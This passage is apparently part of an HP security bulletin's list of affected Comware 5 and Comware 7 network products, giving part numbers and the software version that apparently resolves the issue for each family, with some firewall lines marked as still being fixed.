- JD657A HP MSR30-40 Multi-Service Router
- JD658A HP MSR30-60 Multi-Service Router
- JD660A HP MSR30-20 POE Multi-Service Router
- JD661A HP MSR30-40 POE Multi-Service Router
- JD666A HP MSR30-20 Multi-Service Router
- JF229A HP MSR30-40 Router
- JF230A HP MSR30-60 Router
- JF232A HP RTMSR3040-AC-OVSAS-H3
- JF235A HP MSR30-20 DC Router
- JF284A HP MSR30-20 Router
- JF287A HP MSR30-40 DC Router
- JF801A HP MSR30-60 DC Router
- JF802A HP MSR30-20 PoE Router
- JF803A HP MSR30-40 PoE Router
- JF804A HP MSR30-60 PoE Router
- JG728A HP MSR30-20 TAA-compliant DC Router
- JG729A HP MSR30-20 TAA-compliant Router
- MSR 30-16 (Comware 5) - Version: R2516
- HP Network Products
- JD659A HP MSR30-16 POE Multi-Service Router
- JD665A HP MSR30-16 Multi-Service Router
- JF233A HP MSR30-16 Router
- JF234A HP MSR30-16 PoE Router
- MSR 30-1X (Comware 5) - Version: R2516
- HP Network Products
- JF800A HP MSR30-11 Router
- JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr
- JG182A HP MSR30-11E Router
- JG183A HP MSR30-11F Router
- JG184A HP MSR30-10 DC Router
- MSR 50 (Comware 5) - Version: R2516
- HP Network Products
- JD433A HP MSR50-40 Router
- JD653A HP MSR50 Processor Module
- JD655A HP MSR50-40 Multi-Service Router
- JD656A HP MSR50-60 Multi-Service Router
- JF231A HP MSR50-60 Router
- JF285A HP MSR50-40 DC Router
- JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply
- MSR 50-G2 (Comware 5) - Version: R2516
- HP Network Products
- JD429A HP MSR50 G2 Processor Module
- JD429B HP MSR50 G2 Processor Module
- MSR 9XX (Comware 5) - Version: R2516
- HP Network Products
- JF812A HP MSR900 Router
- JF813A HP MSR920 Router
- JF814A HP MSR900-W Router
- JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr
- JG207A HP MSR900-W Router (NA)
- JG208A HP MSR920-W Router (NA)
- MSR 93X (Comware 5) - Version: R2516
- HP Network Products
- JG511A HP MSR930 Router
- JG511B HP MSR930 Router
- JG512A HP MSR930 Wireless Router
- JG513A HP MSR930 3G Router
- JG513B HP MSR930 3G Router
- JG514A HP MSR931 Router
- JG514B HP MSR931 Router
- JG515A HP MSR931 3G Router
- JG516A HP MSR933 Router
- JG517A HP MSR933 3G Router
- JG518A HP MSR935 Router
- JG518B HP MSR935 Router
- JG519A HP MSR935 Wireless Router
- JG520A HP MSR935 3G Router
- JG531A HP MSR931 Dual 3G Router
- JG531B HP MSR931 Dual 3G Router
- JG596A HP MSR930 4G LTE/3G CDMA Router
- JG597A HP MSR936 Wireless Router
- JG665A HP MSR930 4G LTE/3G WCDMA Global Router
- JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
- JH009A HP MSR931 Serial (TI) Router
- JH010A HP MSR933 G.SHDSL (TI) Router
- JH011A HP MSR935 ADSL2+ (TI) Router
- JH012A HP MSR930 Wireless 802.11n (NA) Router
- JH012B HP MSR930 Wireless 802.11n (NA) Router
- JH013A HP MSR935 Wireless 802.11n (NA) Router
- MSR1000 (Comware 5) - Version: See Mitigation
- HP Network Products
- JG732A HP MSR1003-8 AC Router
- 12500 (Comware 5) - Version: R1829P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JC808A HP 12500 TAA Main Processing Unit
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- 9500E (Comware 5) - Version: R1829P02
- HP Network Products
- JC124A HP A9508 Switch Chassis
- JC124B HP 9505 Switch Chassis
- JC125A HP A9512 Switch Chassis
- JC125B HP 9512 Switch Chassis
- JC474A HP A9508-V Switch Chassis
- JC474B HP 9508-V Switch Chassis
- 10500 (Comware 5) - Version: R1210P02
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC614A HP 10500 Main Processing Unit
- JC748A HP 10512 Switch Chassis
- JG375A HP 10500 TAA-compliant Main Processing Unit
- JG820A HP 10504 TAA-compliant Switch Chassis
- JG821A HP 10508 TAA-compliant Switch Chassis
- JG822A HP 10508-V TAA-compliant Switch Chassis
- JG823A HP 10512 TAA-compliant Switch Chassis
- 7500 (Comware 5) - Version: R6710P02
- HP Network Products
- JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo
- JC697A HP 7502 TAA-compliant Main Processing Unit
- JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports
- JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports
- JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit
- JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit
- JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD194A HP 7500 384Gbps Fabric Module
- JD194B HP 7500 384Gbps Fabric Module
- JD195A HP 7500 384Gbps Advanced Fabric Module
- JD196A HP 7502 Fabric Module
- JD220A HP 7500 768Gbps Fabric Module
- JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports
- JD238A HP 7510 Switch Chassis
- JD238B HP 7510 Switch Chassis
- JD239A HP 7506 Switch Chassis
- JD239B HP 7506 Switch Chassis
- JD240A HP 7503 Switch Chassis
- JD240B HP 7503 Switch Chassis
- JD241A HP 7506-V Switch Chassis
- JD241B HP 7506-V Switch Chassis
- JD242A HP 7502 Switch Chassis
- JD242B HP 7502 Switch Chassis
- JD243A HP 7503-S Switch Chassis with 1 Fabric Slot
- JD243B HP 7503-S Switch Chassis with 1 Fabric Slot
- JE164A HP E7902 Switch Chassis
- JE165A HP E7903 Switch Chassis
- JE166A HP E7903 1 Fabric Slot Switch Chassis
- JE167A HP E7906 Switch Chassis
- JE168A HP E7906 Vertical Switch Chassis
- JE169A HP E7910 Switch Chassis
- 6125G/XG Blade Switch - Version: R2112P05
- HP Network Products
- 737220-B21 HP 6125G Blade Switch with TAA
- 737226-B21 HP 6125G/XG Blade Switch with TAA
- 658250-B21 HP 6125G/XG Blade Switch Opt Kit
- 658247-B21 HP 6125G Blade Switch Opt Kit
- 5830 (Comware 5) - Version: R1118P13
- HP Network Products
- JC691A HP 5830AF-48G Switch with 1 Interface Slot
- JC694A HP 5830AF-96G Switch
- JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot
- JG374A HP 5830AF-96G TAA-compliant Switch
- 5800 (Comware 5) - Version: R1810P03
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
- 5500 HI (Comware 5) - Version: R5501P21
- HP Network Products
- JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots
- JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots
- JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots
- JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
- 5500 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JD373A HP 5500-24G DC EI Switch
- JD374A HP 5500-24G-SFP EI Switch
- JD375A HP 5500-48G EI Switch
- JD376A HP 5500-48G-PoE EI Switch
- JD377A HP 5500-24G EI Switch
- JD378A HP 5500-24G-PoE EI Switch
- JD379A HP 5500-24G-SFP DC EI Switch
- JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots
- JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots
- JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface
- JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots
- JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots
- JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- 4800G (Comware 5) - Version: R2221P22
- HP Network Products
- JD007A HP 4800-24G Switch
- JD008A HP 4800-24G-PoE Switch
- JD009A HP 4800-24G-SFP Switch
- JD010A HP 4800-48G Switch
- JD011A HP 4800-48G-PoE Switch
- 5500SI (Comware 5) - Version: R2221P22
- HP Network Products
- JD369A HP 5500-24G SI Switch
- JD370A HP 5500-48G SI Switch
- JD371A HP 5500-24G-PoE SI Switch
- JD372A HP 5500-48G-PoE SI Switch
- JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots
- JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
- 4500G (Comware 5) - Version: R2221P22
- HP Network Products
- JF428A HP 4510-48G Switch
- JF847A HP 4510-24G Switch
- 5120 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JE066A HP 5120-24G EI Switch
- JE067A HP 5120-48G EI Switch
- JE068A HP 5120-24G EI Switch with 2 Interface Slots
- JE069A HP 5120-48G EI Switch with 2 Interface Slots
- JE070A HP 5120-24G-PoE EI 2-slot Switch
- JE071A HP 5120-48G-PoE EI 2-slot Switch
- JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots
- JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots
- JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots
- JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots
- JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots
- JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
- 4210G (Comware 5) - Version: R2221P22
- HP Network Products
- JF844A HP 4210-24G Switch
- JF845A HP 4210-48G Switch
- JF846A HP 4210-24G-PoE Switch
- 5120 SI (Comware 5) - Version: R1517
- HP Network Products
- JE072A HP 5120-48G SI Switch
- JE072B HPE 5120 48G SI Switch
- JE073A HP 5120-16G SI Switch
- JE073B HPE 5120 16G SI Switch
- JE074A HP 5120-24G SI Switch
- JE074B HPE 5120 24G SI Switch
- JG091A HP 5120-24G-PoE+ (370W) SI Switch
- JG091B HPE 5120 24G PoE+ (370W) SI Switch
- JG092A HP 5120-24G-PoE+ (170W) SI Switch
- JG309B HPE 5120 8G PoE+ (180W) SI Switch
- JG310B HPE 5120 8G PoE+ (65W) SI Switch
- 3610 (Comware 5) - Version: R5319P15
- HP Network Products
- JD335A HP 3610-48 Switch
- JD336A HP 3610-24-4G-SFP Switch
- JD337A HP 3610-24-2G-2G-SFP Switch
- JD338A HP 3610-24-SFP Switch
- 3600V2 (Comware 5) - Version: R2111P01
- HP Network Products
- JG299A HP 3600-24 v2 EI Switch
- JG299B HP 3600-24 v2 EI Switch
- JG300A HP 3600-48 v2 EI Switch
- JG300B HP 3600-48 v2 EI Switch
- JG301A HP 3600-24-PoE+ v2 EI Switch
- JG301B HP 3600-24-PoE+ v2 EI Switch
- JG301C HP 3600-24-PoE+ v2 EI Switch
- JG302A HP 3600-48-PoE+ v2 EI Switch
- JG302B HP 3600-48-PoE+ v2 EI Switch
- JG302C HP 3600-48-PoE+ v2 EI Switch
- JG303A HP 3600-24-SFP v2 EI Switch
- JG303B HP 3600-24-SFP v2 EI Switch
- JG304A HP 3600-24 v2 SI Switch
- JG304B HP 3600-24 v2 SI Switch
- JG305A HP 3600-48 v2 SI Switch
- JG305B HP 3600-48 v2 SI Switch
- JG306A HP 3600-24-PoE+ v2 SI Switch
- JG306B HP 3600-24-PoE+ v2 SI Switch
- JG306C HP 3600-24-PoE+ v2 SI Switch
- JG307A HP 3600-48-PoE+ v2 SI Switch
- JG307B HP 3600-48-PoE+ v2 SI Switch
- JG307C HP 3600-48-PoE+ v2 SI Switch
- 3100V2 (Comware 5) - Version: R5213P01
- HP Network Products
- JD313B HPE 3100 24 PoE v2 EI Switch
- JD318B HPE 3100 8 v2 EI Switch
- JD319B HPE 3100 16 v2 EI Switch
- JD320B HPE 3100 24 v2 EI Switch
- JG221A HPE 3100 8 v2 SI Switch
- JG222A HPE 3100 16 v2 SI Switch
- JG223A HPE 3100 24 v2 SI Switch
- HP870 (Comware 5) - Version: R2607P51
- HP Network Products
- JG723A HP 870 Unified Wired-WLAN Appliance
- JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
- HP850 (Comware 5) - Version: R2607P51
- HP Network Products
- JG722A HP 850 Unified Wired-WLAN Appliance
- JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
- HP830 (Comware 5) - Version: R3507P51
- HP Network Products
- JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch
- JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch
- JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch
- JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
- HP6000 (Comware 5) - Version: R2507P44
- HP Network Products
- JG639A HP 10500/7500 20G Unified Wired-WLAN Module
- JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
- WX5004-EI (Comware 5) - Version: R2507P44
- HP Network Products
- JD447B HP WX5002 Access Controller
- JD448A HP WX5004 Access Controller
- JD448B HP WX5004 Access Controller
- JD469A HP WX5004 Access Controller
- SecBlade FW (Comware 5) - Version: R3181P07
- HP Network Products
- JC635A HP 12500 VPN Firewall Module
- JD245A HP 9500 VPN Firewall Module
- JD249A HP 10500/7500 Advanced VPN Firewall Module
- JD250A HP 6600 Firewall Processing Router Module
- JD251A HP 8800 Firewall Processing Module
- JD255A HP 5820 VPN Firewall Module
- F1000-E (Comware 5) - Version: TBD still fixing
- HP Network Products
- JD272A HP F1000-E VPN Firewall Appliance
- F1000-A-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG214A HP F1000-A-EI VPN Firewall Appliance
- F1000-S-EI (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG213A HP F1000-S-EI VPN Firewall Appliance
- F5000-A (Comware 5) - Version: F3210P26
- HP Network Products
- JD259A HP A5000-A5 VPN Firewall Chassis
- JG215A HP F5000 Firewall Main Processing Unit
- JG216A HP F5000 Firewall Standalone Chassis
- U200S and CS (Comware 5) - Version: F5123P33
- HP Network Products
- JD273A HP U200-S UTM Appliance
- U200A and M (Comware 5) - Version: F5123P33
- HP Network Products
- JD275A HP U200-A UTM Appliance
- F5000-C/S (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG650A HP F5000-C VPN Firewall Appliance
- JG370A HP F5000-S VPN Firewall Appliance
- SecBlade III (Comware 5) - Version: TBD still fixing
- HP Network Products
- JG371A HP 12500 20Gbps VPN Firewall Module
- JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
- 6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- 6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HPE FlexNetwork 6608 Router Chassis
- JC178A HPE FlexNetwork 6604 Router Chassis
- JC178B HPE FlexNetwork 6604 Router Chassis
- JC496A HPE FlexNetwork 6616 Router Chassis
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
- 6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC176A HP 6602 Router Chassis
- HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
- HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
- SMB1910 (Comware 5) - Version: R1113
- HP Network Products
- JG540A HP 1910-48 Switch
- JG539A HP 1910-24-PoE+ Switch
- JG538A HP 1910-24 Switch
- JG537A HP 1910-8 -PoE+ Switch
- JG536A HP 1910-8 Switch
- SMB1920 (Comware 5) - Version: R1112
- HP Network Products
- JG928A HP 1920-48G-PoE+ (370W) Switch
- JG927A HP 1920-48G Switch
- JG926A HP 1920-24G-PoE+ (370W) Switch
- JG925A HP 1920-24G-PoE+ (180W) Switch
- JG924A HP 1920-24G Switch
- JG923A HP 1920-16G Switch
- JG922A HP 1920-8G-PoE+ (180W) Switch
- JG921A HP 1920-8G-PoE+ (65W) Switch
- JG920A HP 1920-8G Switch
- V1910 (Comware 5) - Version: R1517P01
- HP Network Products
- JE005A HP 1910-16G Switch
- JE006A HP 1910-24G Switch
- JE007A HP 1910-24G-PoE (365W) Switch
- JE008A HP 1910-24G-PoE(170W) Switch
- JE009A HP 1910-48G Switch
- JG348A HP 1910-8G Switch
- JG349A HP 1910-8G-PoE+ (65W) Switch
- JG350A HP 1910-8G-PoE+ (180W) Switch
- SMB 1620 (Comware 5) - Version: R1110
- HP Network Products
- JG914A HP 1620-48G Switch
- JG913A HP 1620-24G Switch
- JG912A HP 1620-8G Switch
- NJ5000 - Version: R1107
- HP Network Products
- JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- 10500 (Comware 7) - Version: R7180
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- 12900 (Comware 7) - Version: R1150
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- 5900 (Comware 7) - Version: R2432P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- MSR1000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- MSR2000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- MSR3000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- MSR4000 (Comware 7) - Version: R0306P12
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- VSR (Comware 7) - Version: E0322P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- 7900 (Comware 7) - Version: R2150
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- 5130 (Comware 7) - Version: R3113P02
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- 6125XLG - Version: R2432P01
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- 6127XLG - Version: R2432P01
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- Moonshot - Version: R2432P01
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- 5700 (Comware 7) - Version: R2432P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- 5930 (Comware 7) - Version: R2432P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- HSR6600 (Comware 7) - Version: R7103P09
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- HSR6800 (Comware 7) - Version: R7103P09
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
- 1950 (Comware 7) - Version: R3113P02
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- 7500 (Comware 7) - Version: R7180
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- 5510HI (Comware 7) - Version: R1120
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
